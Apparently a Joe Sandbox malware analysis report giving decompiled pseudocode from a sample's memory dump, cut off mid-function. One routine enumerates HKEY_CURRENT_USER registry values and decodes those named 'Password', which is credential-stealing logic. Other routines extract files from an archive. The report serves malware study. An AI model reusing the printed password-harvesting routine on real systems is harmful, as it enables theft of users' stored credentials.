                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 88%
                                        			E29D85090(intOrPtr* __ecx, intOrPtr* __edx, char* _a4) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v24;
                                        				char _v1048;
                                        				char _v2072;
                                        				char _v3096;
                                        				char _v3104;
                                        				int _v3108;
                                        				intOrPtr _v3116;
                                        				long _v3120;
                                        				char _v3136;
                                        				intOrPtr _v3144;
                                        				long _v3148;
                                        				char _v3164;
                                        				char _v3168;
                                        				intOrPtr* _v3172;
                                        				int _v3176;
                                        				long _v3180;
                                        				void* _v3184;
                                        				int _v3188;
                                        				int _v3192;
                                        				intOrPtr* _v3196;
                                        				intOrPtr* _v3200;
                                        				intOrPtr* _v3204;
                                        				char _v3208;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t141;
                                        				signed int _t142;
                                        				intOrPtr* _t146;
                                        				intOrPtr* _t152;
                                        				void* _t155;
                                        				intOrPtr _t170;
                                        				intOrPtr* _t178;
                                        				intOrPtr* _t183;
                                        				intOrPtr* _t192;
                                        				void* _t199;
                                        				intOrPtr _t208;
                                        				char* _t214;
                                        				char* _t215;
                                        				char* _t218;
                                        				intOrPtr* _t220;
                                        				char* _t222;
                                        				char* _t223;
                                        				intOrPtr _t225;
                                        				intOrPtr _t228;
                                        				intOrPtr _t231;
                                        				void* _t236;
                                        				void* _t250;
                                        				void* _t253;
                                        				void* _t255;
                                        				intOrPtr* _t257;
                                        				void* _t258;
                                        				intOrPtr _t259;
                                        				intOrPtr _t260;
                                        				void* _t261;
                                        				intOrPtr* _t262;
                                        				intOrPtr* _t264;
                                        				void* _t265;
                                        				intOrPtr* _t266;
                                        				signed int _t270;
                                        				intOrPtr* _t271;
                                        				signed int _t272;
                                        				void* _t273;
                                        				void* _t274;
                                        				void* _t275;
                                        
                                        				_t234 = __edx;
                                        				_push(0xffffffff);
                                        				_push(E29DC29B7);
                                        				_push( *[fs:0x0]);
                                        				_t274 = _t273 - 0xc78;
                                        				_t141 =  *0x29dd5664; // 0xd9555f04
                                        				_t142 = _t141 ^ _t272;
                                        				_v24 = _t142;
                                        				_push(_t142);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t264 = __edx;
                                        				_v3208 = 0;
                                        				_t257 = __ecx;
                                        				_v3196 = __ecx;
                                        				_v3172 = __edx;
                                        				_v3184 = 0x80000001;
                                        				 *__edx = 0;
                                        				 *((intOrPtr*)(__edx + 4)) = 0;
                                        				 *((intOrPtr*)(__edx + 8)) = 0;
                                        				_v8 = 0;
                                        				_v3208 = 1;
                                        				 *__ecx = 0;
                                        				if(RegOpenKeyExA(0x80000001, _a4, 0, 0x20019,  &_v3184) != 0) {
                                        					L2:
                                        					_t146 = _t264;
                                        					L3:
                                        					 *[fs:0x0] = _v16;
                                        					_pop(_t258);
                                        					_pop(_t265);
                                        					_pop(_t199);
                                        					return E29DADF46(_t146, _t199, _v24 ^ _t272, _t234, _t258, _t265);
                                        				}
                                        				_t234 =  &_v3192;
                                        				_v3180 = 0;
                                        				_v3192 = 0xff;
                                        				_v3188 = 3;
                                        				_v2072 = 0;
                                        				if(RegEnumValueA(_v3184, 0,  &_v2072,  &_v3192, 0,  &_v3188,  &_v1048,  &_v3176) == 0) {
                                        					while(1) {
                                        						_v3144 = 0xf;
                                        						_v3148 = 0;
                                        						_v3164 = 0;
                                        						_v3116 = 0xf;
                                        						_v3120 = 0;
                                        						_v3136 = 0;
                                        						_t152 =  &_v2072;
                                        						_v8 = 1;
                                        						_t236 = _t152 + 1;
                                        						do {
                                        							_t208 =  *_t152;
                                        							_t152 = _t152 + 1;
                                        						} while (_t208 != 0);
                                        						E29D892C0( &_v3164,  &_v2072, _t152 - _t236);
                                        						_t155 = _v3188;
                                        						_v3168 = _t155;
                                        						_v3108 = _v3176;
                                        						if(_t155 != 3) {
                                        							if(_t155 != 1) {
                                        								if(_t155 == 4) {
                                        									_v3104 = _v1048;
                                        								}
                                        								L21:
                                        								 *_t257 =  *_t257 + 1;
                                        								_t259 =  *((intOrPtr*)(_t264 + 4));
                                        								if( &_v3168 >= _t259) {
                                        									L28:
                                        									if(_t259 ==  *((intOrPtr*)(_t264 + 8))) {
                                        										E29D89250(_t264);
                                        									}
                                        									_t266 =  *((intOrPtr*)(_t264 + 4));
                                        									_v3200 = _t266;
                                        									_v3204 = _t266;
                                        									_v8 = 4;
                                        									_t260 = 0xf;
                                        									if(_t266 != 0) {
                                        										_t101 = _t266 + 4; // 0x5
                                        										_t214 = _t101;
                                        										 *_t266 = _v3168;
                                        										 *((intOrPtr*)(_t214 + 0x14)) = 0xf;
                                        										 *((intOrPtr*)(_t214 + 0x10)) = 0;
                                        										 *_t214 = 0;
                                        										E29D894C0(_t214,  &_v3164, 0, 0xffffffff);
                                        										_t105 = _t266 + 0x20; // 0x21
                                        										_t215 = _t105;
                                        										_v8 = 5;
                                        										 *((intOrPtr*)(_t215 + 0x14)) = 0xf;
                                        										 *((intOrPtr*)(_t215 + 0x10)) = 0;
                                        										 *_t215 = 0;
                                        										E29D894C0(_t215,  &_v3136, 0, 0xffffffff);
                                        										 *((intOrPtr*)(_t266 + 0x3c)) = _v3108;
                                        										 *(_t266 + 0x40) = _v3104;
                                        									}
                                        									 *((intOrPtr*)(_v3172 + 4)) =  *((intOrPtr*)(_v3172 + 4)) + 0x44;
                                        									L33:
                                        									_v3180 = _v3180 + 1;
                                        									_v8 = 0;
                                        									_v3192 = 0x400;
                                        									_v3176 = 0x400;
                                        									if(_v3116 >= 0x10) {
                                        										_push(_v3136);
                                        										E29DADF3B();
                                        										_t274 = _t274 + 4;
                                        									}
                                        									_v3116 = _t260;
                                        									_v3120 = 0;
                                        									_v3136 = 0;
                                        									if(_v3144 >= 0x10) {
                                        										_push(_v3164);
                                        										E29DADF3B();
                                        										_t274 = _t274 + 4;
                                        									}
                                        									_t234 = _v3184;
                                        									_v3144 = _t260;
                                        									_v3148 = 0;
                                        									_v3164 = 0;
                                        									if(RegEnumValueA(_v3184, _v3180,  &_v2072,  &_v3192, 0,  &_v3188,  &_v1048,  &_v3176) == 0) {
                                        										_t264 = _v3172;
                                        										_t257 = _v3196;
                                        										continue;
                                        									} else {
                                        										_t146 = _v3172;
                                        										goto L3;
                                        									}
                                        								}
                                        								_t170 =  *_t264;
                                        								_t218 =  &_v3168;
                                        								if(_t170 > _t218) {
                                        									goto L28;
                                        								}
                                        								_t220 = _v3172;
                                        								_t270 = (0x78787879 * (_t218 - _t170) >> 0x20 >> 5 >> 0x1f) + (0x78787879 * (_t218 - _t170) >> 0x20 >> 5);
                                        								if(_t259 ==  *((intOrPtr*)(_t220 + 8))) {
                                        									E29D89250(_t220);
                                        									_t220 = _v3172;
                                        								}
                                        								_t271 =  *((intOrPtr*)(_t220 + 4));
                                        								_t262 =  *_t220 + ((_t270 << 4) + _t270) * 4;
                                        								_v3204 = _t271;
                                        								_v3200 = _t271;
                                        								_v8 = 2;
                                        								if(_t271 != 0) {
                                        									 *_t271 =  *_t262;
                                        									_t79 = _t271 + 4; // 0x5
                                        									_t222 = _t79;
                                        									 *((intOrPtr*)(_t222 + 0x14)) = 0xf;
                                        									 *((intOrPtr*)(_t222 + 0x10)) = 0;
                                        									 *_t222 = 0;
                                        									E29D894C0(_t222, _t262 + 4, 0, 0xffffffff);
                                        									_t83 = _t271 + 0x20; // 0x21
                                        									_t223 = _t83;
                                        									_v8 = 3;
                                        									 *((intOrPtr*)(_t223 + 0x14)) = 0xf;
                                        									 *((intOrPtr*)(_t223 + 0x10)) = 0;
                                        									 *_t223 = 0;
                                        									E29D894C0(_t223, _t262 + 0x20, 0, 0xffffffff);
                                        									 *((intOrPtr*)(_t271 + 0x3c)) =  *((intOrPtr*)(_t262 + 0x3c));
                                        									_t220 = _v3172;
                                        									 *((intOrPtr*)(_t271 + 0x40)) =  *((intOrPtr*)(_t262 + 0x40));
                                        								}
                                        								 *((intOrPtr*)(_t220 + 4)) =  *((intOrPtr*)(_t220 + 4)) + 0x44;
                                        								_t260 = 0xf;
                                        								goto L33;
                                        							}
                                        							_t178 =  &_v1048;
                                        							_t250 = _t178 + 1;
                                        							do {
                                        								_t225 =  *_t178;
                                        								_t178 = _t178 + 1;
                                        							} while (_t225 != 0);
                                        							E29D892C0( &_v3136,  &_v1048, _t178 - _t250);
                                        							goto L21;
                                        						}
                                        						if(StrStrA( &_v2072, "Password") == 0) {
                                        							E29D89910( &_v1048, "%S",  &_v1048);
                                        							_t183 =  &_v1048;
                                        							_t274 = _t274 + 8;
                                        							_t253 = _t183 + 1;
                                        							do {
                                        								_t228 =  *_t183;
                                        								_t183 = _t183 + 1;
                                        							} while (_t228 != 0);
                                        							E29D892C0( &_v3136,  &_v1048, _t183 - _t253);
                                        							goto L21;
                                        						}
                                        						_t261 = E29D85010( &_v1048, _v3176);
                                        						E29DAE6AF( &_v3096, 0x400, _t261);
                                        						_t275 = _t274 + 0x14;
                                        						HeapFree(GetProcessHeap(), 0, _t261);
                                        						_t192 =  &_v3096;
                                        						_t255 = _t192 + 1;
                                        						do {
                                        							_t231 =  *_t192;
                                        							_t192 = _t192 + 1;
                                        						} while (_t231 != 0);
                                        						E29D892C0( &_v3136,  &_v3096, _t192 - _t255);
                                        						E29DAE6AF( &_v3096, 0x400, 0x29dcd617);
                                        						_t257 = _v3196;
                                        						_t274 = _t275 + 0xc;
                                        						goto L21;
                                        					}
                                        				}
                                        				goto L2;
                                        			}

                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,80000001,D9555F04), ref: 29D8510D
                                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?), ref: 29D85163
                                        • StrStrA.SHLWAPI(?,Password,?,?), ref: 29D8521E
                                        • _strcpy_s.LIBCMT ref: 29D8524E
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 29D85258
                                        • HeapFree.KERNEL32(00000000), ref: 29D8525F
                                        • _strcpy_s.LIBCMT ref: 29D8529D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap_strcpy_s$EnumFreeOpenProcessValue
                                        • String ID: Password$yxxx
                                        • API String ID: 1955650795-2072026738
                                        • Opcode ID: 5a4f529137064749b02a9b3a09a556c0f590f9b6b1b2306c40aac9a236a890bb
                                        • Instruction ID: 8591c462b0c894c7566ade346bae140c75b19c2754d39b1537804fdfc8d794a1
                                        • Opcode Fuzzy Hash: 5a4f529137064749b02a9b3a09a556c0f590f9b6b1b2306c40aac9a236a890bb
                                        • Instruction Fuzzy Hash: B4E162B18002689FEB25CF28CD84FDAB7B9BF44304F1086DDD549A7641DB31AA86DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E29D8E4F0(void* __edx, void* _a4, void* _a8) {
                                        				signed int _v8;
                                        				char _v275;
                                        				char _v276;
                                        				char _v540;
                                        				struct _FILETIME _v560;
                                        				struct _FILETIME _v568;
                                        				struct _FILETIME _v576;
                                        				unsigned int _v580;
                                        				char _v844;
                                        				char _v845;
                                        				void* _v852;
                                        				long _v856;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t66;
                                        				intOrPtr* _t69;
                                        				void* _t70;
                                        				signed char _t74;
                                        				void* _t75;
                                        				void* _t77;
                                        				void* _t90;
                                        				void* _t91;
                                        				intOrPtr _t95;
                                        				signed int _t98;
                                        				void* _t100;
                                        				void** _t103;
                                        				void* _t105;
                                        				void* _t108;
                                        				void* _t110;
                                        				void* _t123;
                                        				void* _t127;
                                        				long _t128;
                                        				void* _t131;
                                        				signed int _t132;
                                        				void* _t133;
                                        				signed int _t134;
                                        				void* _t135;
                                        				void* _t136;
                                        				void* _t137;
                                        				void* _t138;
                                        
                                        				_t119 = __edx;
                                        				_t66 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t66 ^ _t134;
                                        				_v852 = _a8;
                                        				_t69 =  *0x29dd82dc; // 0x0
                                        				if(_t69 == 0) {
                                        					L6:
                                        					_t70 = 0x10000;
                                        					L46:
                                        					 *0x29dd86b0 = _t70;
                                        					return E29DADF46(_t70, _t103, _v8 ^ _t134, _t119, _t127, _t131);
                                        				}
                                        				if( *_t69 == 1) {
                                        					_t103 =  *(_t69 + 4);
                                        					_t132 = _t131 | 0xffffffff;
                                        					_v856 = _t103;
                                        					__eflags = _t103[1] - _t132;
                                        					if(_t103[1] != _t132) {
                                        						E29D8D630(_t105,  *_t103);
                                        					}
                                        					_t127 = _a4;
                                        					_t103[1] = _t132;
                                        					_t131 =  *_t103;
                                        					__eflags = _t127 -  *((intOrPtr*)(_t131 + 4));
                                        					if(_t127 <  *((intOrPtr*)(_t131 + 4))) {
                                        						__eflags = _t127 -  *((intOrPtr*)(_t131 + 0x10));
                                        						if(_t127 <  *((intOrPtr*)(_t131 + 0x10))) {
                                        							E29D8CE10(_t131);
                                        						}
                                        						_t108 =  *_t103;
                                        						__eflags =  *((intOrPtr*)(_t108 + 0x10)) - _t127;
                                        						if( *((intOrPtr*)(_t108 + 0x10)) >= _t127) {
                                        							L15:
                                        							_t119 =  &_v844;
                                        							E29D8D7B0(_t103,  &_v844, _t127);
                                        							_t74 = _v580 >> 4;
                                        							__eflags = _t74 & 0x00000001;
                                        							if((_t74 & 0x00000001) == 0) {
                                        								_t127 = _v852;
                                        								_t75 =  *_t127;
                                        								_v540 = 0;
                                        								_t133 = _t127;
                                        								_t110 = _t127;
                                        								__eflags = _t75;
                                        								if(_t75 == 0) {
                                        									L23:
                                        									E29DAE8E8( &_v276, _t127, 0x104);
                                        									_t136 = _t135 + 0xc;
                                        									__eflags = _t133 - _t127;
                                        									if(_t133 != _t127) {
                                        										 *((char*)(_t134 + _t133 - _t127 - 0x110)) = 0;
                                        										_t77 = _v276;
                                        										__eflags = _t77 - 0x2f;
                                        										if(_t77 == 0x2f) {
                                        											L32:
                                        											wsprintfA( &_v540, "%s%s",  &_v276, _t133);
                                        											_t137 = _t136 + 0x10;
                                        											L26:
                                        											_t119 = _v580;
                                        											_t131 = CreateFileA( &_v540, 0x40000000, 0, 0, 2, _v580, 0);
                                        											__eflags = _t131 - 0xffffffff;
                                        											if(_t131 != 0xffffffff) {
                                        												E29D8D260( *_t103, _t103[0x4e], _t103[0x4e]);
                                        												_t103 = _v856;
                                        												_t138 = _t137 + 4;
                                        												__eflags = _t103[0x4f];
                                        												if(__eflags == 0) {
                                        													_t91 = E29DAD4FB(_t103, _t119, _t127, _t131, __eflags, 0x4000);
                                        													_t138 = _t138 + 4;
                                        													_t103[0x4f] = _t91;
                                        												}
                                        												_v852 = 0;
                                        												while(1) {
                                        													_t119 =  &_v845;
                                        													_t114 = 0x4000;
                                        													_t128 = E29D8D3D0( *_t103, 0x4000, _t103[0x4f],  &_v845);
                                        													_t138 = _t138 + 8;
                                        													__eflags = _t128 - 0xffffff96;
                                        													if(_t128 == 0xffffff96) {
                                        														break;
                                        													}
                                        													__eflags = _t128;
                                        													if(__eflags < 0) {
                                        														L42:
                                        														_v852 = 0x5000000;
                                        														L43:
                                        														E29D8D630(_t114,  *_t103);
                                        														_t127 = _v852;
                                        														__eflags = _t127;
                                        														if(_t127 == 0) {
                                        															_t119 =  &_v568;
                                        															SetFileTime(_t131,  &_v568,  &_v576,  &_v560);
                                        														}
                                        														CloseHandle(_t131);
                                        														_t70 = _t127;
                                        														goto L46;
                                        													}
                                        													if(__eflags <= 0) {
                                        														L40:
                                        														__eflags = _v845;
                                        														if(_v845 != 0) {
                                        															goto L43;
                                        														}
                                        														__eflags = _t128;
                                        														if(_t128 != 0) {
                                        															continue;
                                        														}
                                        														goto L42;
                                        													}
                                        													_t119 = _t103[0x4f];
                                        													_t114 =  &_v856;
                                        													_t90 = WriteFile(_t131, _t103[0x4f], _t128,  &_v856, 0);
                                        													__eflags = _t90;
                                        													if(_t90 == 0) {
                                        														_v852 = 0x400;
                                        														goto L43;
                                        													}
                                        													goto L40;
                                        												}
                                        												_v852 = 0x1000;
                                        												goto L43;
                                        											}
                                        											_t70 = 0x200;
                                        											goto L46;
                                        										}
                                        										__eflags = _t77 - 0x5c;
                                        										if(_t77 == 0x5c) {
                                        											goto L32;
                                        										}
                                        										__eflags = _t77;
                                        										if(_t77 == 0) {
                                        											L25:
                                        											wsprintfA( &_v540, "%s%s%s",  &(_t103[0x50]),  &_v276, _t133);
                                        											_t137 = _t136 + 0x14;
                                        											goto L26;
                                        										}
                                        										__eflags = _v275 - 0x3a;
                                        										if(_v275 != 0x3a) {
                                        											goto L25;
                                        										}
                                        										goto L32;
                                        									}
                                        									_v276 = 0;
                                        									goto L25;
                                        								}
                                        								do {
                                        									__eflags = _t75 - 0x2f;
                                        									if(_t75 == 0x2f) {
                                        										L21:
                                        										_t133 = _t110 + 1;
                                        										goto L22;
                                        									}
                                        									__eflags = _t75 - 0x5c;
                                        									if(_t75 != 0x5c) {
                                        										goto L22;
                                        									}
                                        									goto L21;
                                        									L22:
                                        									_t75 =  *(_t110 + 1);
                                        									_t110 = _t110 + 1;
                                        									__eflags = _t75;
                                        								} while (_t75 != 0);
                                        								goto L23;
                                        							}
                                        							_t70 = 0;
                                        							goto L46;
                                        						} else {
                                        							do {
                                        								_t131 =  *_t103;
                                        								__eflags = _t131;
                                        								if(_t131 != 0) {
                                        									__eflags =  *(_t131 + 0x18);
                                        									if( *(_t131 + 0x18) != 0) {
                                        										_t95 =  *((intOrPtr*)(_t131 + 0x10)) + 1;
                                        										__eflags = _t95 -  *((intOrPtr*)(_t131 + 4));
                                        										if(_t95 !=  *((intOrPtr*)(_t131 + 4))) {
                                        											 *((intOrPtr*)(_t131 + 0x10)) = _t95;
                                        											 *((intOrPtr*)(_t131 + 0x14)) =  *((intOrPtr*)(_t131 + 0x14)) +  *((intOrPtr*)(_t131 + 0x50)) +  *((intOrPtr*)(_t131 + 0x4c)) +  *((intOrPtr*)(_t131 + 0x48)) + 0x2e;
                                        											_t98 = E29D8CA10(_t131, _t131 + 0x28, _t131 + 0x78, 0, 0);
                                        											_t135 = _t135 + 0x10;
                                        											asm("sbb eax, eax");
                                        											_t100 =  ~_t98 + 1;
                                        											__eflags = _t100;
                                        											 *(_t131 + 0x18) = _t100;
                                        										}
                                        									}
                                        								}
                                        								_t123 =  *_t103;
                                        								__eflags =  *((intOrPtr*)(_t123 + 0x10)) - _t127;
                                        							} while ( *((intOrPtr*)(_t123 + 0x10)) < _t127);
                                        							goto L15;
                                        						}
                                        					} else {
                                        						goto L6;
                                        					}
                                        				} else {
                                        					_t70 = 0x80000;
                                        					goto L46;
                                        				}
                                        			}

                                        APIs
                                        • SetFileTime.KERNEL32(00000000,?,?,?), ref: 29D8E788
                                        • CloseHandle.KERNEL32(00000000), ref: 29D8E78F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFileHandleTime
                                        • String ID: %s%s$%s%s%s$:
                                        • API String ID: 2100898393-3034790606
                                        • Opcode ID: c2bd6088dbb00b13d4f8e570340300c7c6a9debb9ce7100432009996600fbe02
                                        • Instruction ID: 0f0cac4f087c1800f9aa338f3137961c6f56cc41ad8eadf81b507bb1da2119dd
                                        • Opcode Fuzzy Hash: c2bd6088dbb00b13d4f8e570340300c7c6a9debb9ce7100432009996600fbe02
                                        • Instruction Fuzzy Hash: 2D8124719002149BCB25EF24CC84BDA73B9BF55704F0446DDE649ABA82D770AA87DFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E29D89B10(void* __eax, intOrPtr* __ebx, void* __ecx, intOrPtr* __esi, signed int _a4) {
                                        				intOrPtr _v0;
                                        				char _v8;
                                        				intOrPtr _t40;
                                        				void* _t41;
                                        				intOrPtr _t42;
                                        				intOrPtr _t44;
                                        				signed int _t45;
                                        				signed int _t48;
                                        				signed int _t53;
                                        				signed int _t57;
                                        				signed int _t58;
                                        				void* _t65;
                                        				intOrPtr _t66;
                                        				intOrPtr _t68;
                                        				intOrPtr* _t69;
                                        				intOrPtr* _t73;
                                        				intOrPtr _t78;
                                        				char* _t83;
                                        				void* _t88;
                                        				signed int _t100;
                                        				intOrPtr _t101;
                                        				intOrPtr _t102;
                                        				signed int _t103;
                                        				intOrPtr _t105;
                                        				intOrPtr _t108;
                                        				intOrPtr* _t109;
                                        				intOrPtr* _t110;
                                        				intOrPtr _t112;
                                        				intOrPtr* _t113;
                                        				signed int _t117;
                                        				char _t123;
                                        				signed int _t125;
                                        				void* _t128;
                                        				intOrPtr _t129;
                                        				signed int _t139;
                                        
                                        				_t138 = __esi;
                                        				_t87 = __ebx;
                                        				_push(__ecx);
                                        				_t100 = _a4;
                                        				_t128 = __eax;
                                        				_t40 =  *((intOrPtr*)(__ebx + 0x10));
                                        				if(_t40 < _t100) {
                                        					_t41 = E29DAD48D("invalid string position");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					asm("int3");
                                        					_push(__ebx);
                                        					_t88 = _t41;
                                        					_push(__esi);
                                        					_t139 = _t100;
                                        					if(_t88 == 0) {
                                        						L53:
                                        						_t42 =  *((intOrPtr*)(_t139 + 0x10));
                                        						_t101 = _v0;
                                        						if((_t117 | 0xffffffff) - _t42 <= _t101) {
                                        							_t42 = E29DAD440("string too long");
                                        						}
                                        						if(_t101 == 0) {
                                        							L77:
                                        							return _t139;
                                        						} else {
                                        							_push(_t128);
                                        							_t129 = _t42 + _t101;
                                        							if(_t129 > 0xfffffffe) {
                                        								_t42 = E29DAD440("string too long");
                                        							}
                                        							_t102 =  *((intOrPtr*)(_t139 + 0x14));
                                        							if(_t102 >= _t129) {
                                        								if(_t129 != 0) {
                                        									goto L60;
                                        								} else {
                                        									 *((intOrPtr*)(_t139 + 0x10)) = _t129;
                                        									if(_t102 < 0x10) {
                                        										_t53 = _t139;
                                        										 *_t53 = 0;
                                        										return _t53;
                                        									} else {
                                        										 *( *_t139) = 0;
                                        										return _t139;
                                        									}
                                        								}
                                        							} else {
                                        								E29D89750(_t139, _t129, _t42);
                                        								if(_t129 == 0) {
                                        									L76:
                                        									goto L77;
                                        								} else {
                                        									L60:
                                        									_t44 =  *((intOrPtr*)(_t139 + 0x14));
                                        									if(_t44 < 0x10) {
                                        										_t103 = _t139;
                                        									} else {
                                        										_t103 =  *_t139;
                                        									}
                                        									if(_t44 < 0x10) {
                                        										_t45 = _t139;
                                        									} else {
                                        										_t45 =  *_t139;
                                        									}
                                        									E29DAE1F0(_t45 + _v0, _t103,  *((intOrPtr*)(_t139 + 0x10)));
                                        									if( *((intOrPtr*)(_t139 + 0x14)) < 0x10) {
                                        										_t48 = _t139;
                                        									} else {
                                        										_t48 =  *_t139;
                                        									}
                                        									E29DB0010(_t48, _t88, _v0);
                                        									 *((intOrPtr*)(_t139 + 0x10)) = _t129;
                                        									if( *((intOrPtr*)(_t139 + 0x14)) < 0x10) {
                                        										 *((char*)(_t139 + _t129)) = 0;
                                        										goto L76;
                                        									} else {
                                        										 *((char*)( *_t139 + _t129)) = 0;
                                        										return _t139;
                                        									}
                                        								}
                                        							}
                                        						}
                                        					} else {
                                        						_t105 =  *((intOrPtr*)(_t139 + 0x14));
                                        						if(_t105 < 0x10) {
                                        							_t57 = _t139;
                                        						} else {
                                        							_t57 =  *_t139;
                                        						}
                                        						if(_t88 < _t57) {
                                        							goto L53;
                                        						} else {
                                        							if(_t105 < 0x10) {
                                        								_t58 = _t139;
                                        							} else {
                                        								_t58 =  *_t139;
                                        							}
                                        							_t117 =  *((intOrPtr*)(_t139 + 0x10)) + _t58;
                                        							if(_t117 <= _t88) {
                                        								goto L53;
                                        							} else {
                                        								if(_t105 < 0x10) {
                                        									return E29D89B10(_v0, _t139, _t105, _t139, _t88 - _t139);
                                        								} else {
                                        									return E29D89B10(_v0, _t139, _t105, _t139, _t88 -  *_t139);
                                        								}
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					_t65 = _t40 - _t100;
                                        					if(_t65 < __eax) {
                                        						_t128 = _t65;
                                        					}
                                        					_t66 =  *((intOrPtr*)(_t138 + 0x10));
                                        					if((_t100 | 0xffffffff) - _t66 <= _t128) {
                                        						_t66 = E29DAD440("string too long");
                                        					}
                                        					if(_t128 == 0) {
                                        						L39:
                                        						return _t138;
                                        					} else {
                                        						_t123 = _t66 + _t128;
                                        						_v8 = _t123;
                                        						if(_t123 > 0xfffffffe) {
                                        							_t66 = E29DAD440("string too long");
                                        						}
                                        						_t108 =  *((intOrPtr*)(_t138 + 0x14));
                                        						if(_t108 >= _t123) {
                                        							if(_t123 != 0) {
                                        								goto L10;
                                        							} else {
                                        								 *((intOrPtr*)(_t138 + 0x10)) = _t123;
                                        								if(_t108 < 0x10) {
                                        									_t83 = _t138;
                                        									 *_t83 = 0;
                                        									return _t83;
                                        								} else {
                                        									 *((char*)( *_t138)) = _t123;
                                        									return _t138;
                                        								}
                                        							}
                                        						} else {
                                        							E29D89750(_t138, _t123, _t66);
                                        							if(_v8 == 0) {
                                        								goto L39;
                                        							} else {
                                        								L10:
                                        								_t68 =  *((intOrPtr*)(_t138 + 0x14));
                                        								if(_t68 < 0x10) {
                                        									_t109 = _t138;
                                        								} else {
                                        									_t109 =  *_t138;
                                        								}
                                        								if(_t68 < 0x10) {
                                        									_t69 = _t138;
                                        								} else {
                                        									_t69 =  *_t138;
                                        								}
                                        								E29DAE1F0(_t69 + _t128, _t109,  *((intOrPtr*)(_t138 + 0x10)));
                                        								if(_t138 != _t87) {
                                        									if( *((intOrPtr*)(_t87 + 0x14)) < 0x10) {
                                        										_t110 = _t87;
                                        									} else {
                                        										_t110 =  *_t87;
                                        									}
                                        									if( *((intOrPtr*)(_t138 + 0x14)) < 0x10) {
                                        										_t73 = _t138;
                                        									} else {
                                        										_t73 =  *_t138;
                                        									}
                                        									E29DB0010(_t73, _t110 + _a4, _t128);
                                        								} else {
                                        									_t125 = _a4;
                                        									if(_t125 != 0) {
                                        										_t125 = _t125 + _t128;
                                        									}
                                        									_t78 =  *((intOrPtr*)(_t138 + 0x14));
                                        									if(_t78 < 0x10) {
                                        										_t113 = _t138;
                                        									} else {
                                        										_t113 =  *_t138;
                                        									}
                                        									if(_t78 < 0x10) {
                                        										E29DAE1F0(_t138, _t113 + _t125, _t128);
                                        									} else {
                                        										E29DAE1F0( *_t138, _t113 + _t125, _t128);
                                        									}
                                        								}
                                        								_t112 = _v8;
                                        								 *((intOrPtr*)(_t138 + 0x10)) = _t112;
                                        								if( *((intOrPtr*)(_t138 + 0x14)) < 0x10) {
                                        									 *((char*)(_t138 + _t112)) = 0;
                                        									goto L39;
                                        								} else {
                                        									 *((char*)( *_t138 + _t112)) = 0;
                                        									return _t138;
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                        • String ID: Software\Micr$invalid string position$string too long
                                        • API String ID: 2168136238-2646184632
                                        • Opcode ID: 245d74ae2eae1fe01b4cf3ef4fb8fed6932cf86b1906f6ad391dac6fd3c52df8
                                        • Instruction ID: f876d4bdacfca396a2d163d3f1489a767b7b682dfe5c8be8d398cd98fa561ac5
                                        • Opcode Fuzzy Hash: 245d74ae2eae1fe01b4cf3ef4fb8fed6932cf86b1906f6ad391dac6fd3c52df8
                                        • Instruction Fuzzy Hash: CB51A4717101009BD728CE6DD8D8D2AB3EEFF916107144A2EE5C287E46DB71AC53A7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 76%
                                        			E29D98D80(void* __ecx, void* __edi, char* _a4) {
                                        				intOrPtr* _v8;
                                        				char _v12;
                                        				char _v24;
                                        				char _v40;
                                        				signed char _t35;
                                        				intOrPtr* _t36;
                                        				void* _t38;
                                        				intOrPtr _t40;
                                        				intOrPtr _t44;
                                        				intOrPtr* _t48;
                                        				void* _t52;
                                        				char* _t54;
                                        				intOrPtr* _t64;
                                        				intOrPtr _t68;
                                        
                                        				_t52 = __ecx;
                                        				if(_a4 != 0) {
                                        					E29DAFF06(0, 0);
                                        				}
                                        				_t35 =  *(_t52 + 0x10) &  *(_t52 + 0xc);
                                        				if((_t35 & 0x00000004) != 0) {
                                        					_t48 = E29DAD5A5();
                                        					_a4 = "ios_base::badbit set";
                                        					E29DAE0FC( &_v24,  &_a4);
                                        					_v12 = 1;
                                        					_v8 = _t48;
                                        					_v24 = 0x29dd06d8;
                                        					_t35 = E29DAFF06( &_v24, 0x29dd20bc);
                                        				}
                                        				if((_t35 & 0x00000002) != 0) {
                                        					_t44 = E29DAD5A5();
                                        					_a4 = "ios_base::failbit set";
